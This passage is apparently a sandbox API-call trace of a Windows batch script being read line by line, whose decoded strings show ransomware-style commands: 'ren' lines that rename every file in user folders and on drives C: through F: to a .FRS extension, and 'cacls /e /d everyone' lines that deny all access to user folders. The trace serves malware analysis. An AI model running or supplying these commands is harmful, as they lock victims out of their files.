lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.586] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0146.586] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0146.586] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0146.586] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.586] GetFileType (hFile=0x2ec) returned 0x1 [0146.586] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0146.586] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.586] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0146.586] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0146.586] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0146.586] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.586] GetFileType (hFile=0x2ec) returned 0x1 [0146.586] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0146.587] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.587] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0146.587] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0146.587] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0146.587] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.587] GetFileType (hFile=0x2ec) returned 0x1 [0146.587] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0146.587] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.587] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0146.587] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0146.587] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0146.587] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.587] GetFileType (hFile=0x2ec) returned 0x1 [0146.587] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0146.587] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.587] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0146.587] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0146.587] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0146.587] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.587] GetFileType (hFile=0x2ec) returned 0x1 [0146.587] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0146.587] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.587] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0146.587] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0146.587] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0146.588] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.588] GetFileType (hFile=0x2ec) returned 0x1 [0146.588] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0146.588] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.588] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0146.588] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0146.588] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0146.588] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.588] GetFileType (hFile=0x2ec) returned 0x1 [0146.588] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0146.588] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.588] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0146.588] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0146.588] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0146.588] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.588] GetFileType (hFile=0x2ec) returned 0x1 [0146.588] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0146.588] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.588] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0146.588] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0146.588] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0146.588] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.588] GetFileType (hFile=0x2ec) returned 0x1 [0146.588] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0146.589] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.589] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0146.589] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0146.589] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0146.589] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.589] GetFileType (hFile=0x2ec) returned 0x1 [0146.589] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0146.589] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.589] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0146.589] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0146.589] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0146.589] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.589] GetFileType (hFile=0x2ec) returned 0x1 [0146.589] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0146.589] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.589] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0146.589] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0146.589] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0146.589] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.589] GetFileType (hFile=0x2ec) returned 0x1 [0146.589] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0146.589] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.589] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0146.589] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0146.590] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0146.590] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.590] GetFileType (hFile=0x2ec) returned 0x1 [0146.590] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0146.590] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.590] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0146.590] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0146.590] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0146.590] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.590] GetFileType (hFile=0x2ec) returned 0x1 [0146.590] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0146.590] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.590] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0146.590] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0146.590] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0146.590] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.590] GetFileType (hFile=0x2ec) returned 0x1 [0146.590] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0146.590] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.590] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0146.590] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0146.590] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0146.590] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.590] GetFileType (hFile=0x2ec) returned 0x1 [0146.590] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0146.591] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.591] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0146.591] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0146.591] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0146.591] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.591] GetFileType (hFile=0x2ec) returned 0x1 [0146.591] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0146.591] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.591] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0146.591] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0146.591] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0146.591] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.591] GetFileType (hFile=0x2ec) returned 0x1 [0146.591] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0146.591] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.591] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0146.591] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0146.591] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0146.591] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.591] GetFileType (hFile=0x2ec) returned 0x1 [0146.591] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0146.591] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.591] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0146.592] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0146.592] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0146.592] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.592] GetFileType (hFile=0x2ec) returned 0x1 [0146.592] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0146.592] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.592] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0146.592] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0146.592] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0146.592] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.592] GetFileType (hFile=0x2ec) returned 0x1 [0146.592] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0146.592] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.592] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0146.592] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0146.592] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0146.592] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.592] GetFileType (hFile=0x2ec) returned 0x1 [0146.592] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0146.592] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.592] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0146.592] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0146.592] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0146.592] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.593] GetFileType (hFile=0x2ec) returned 0x1 [0146.593] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0146.593] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: 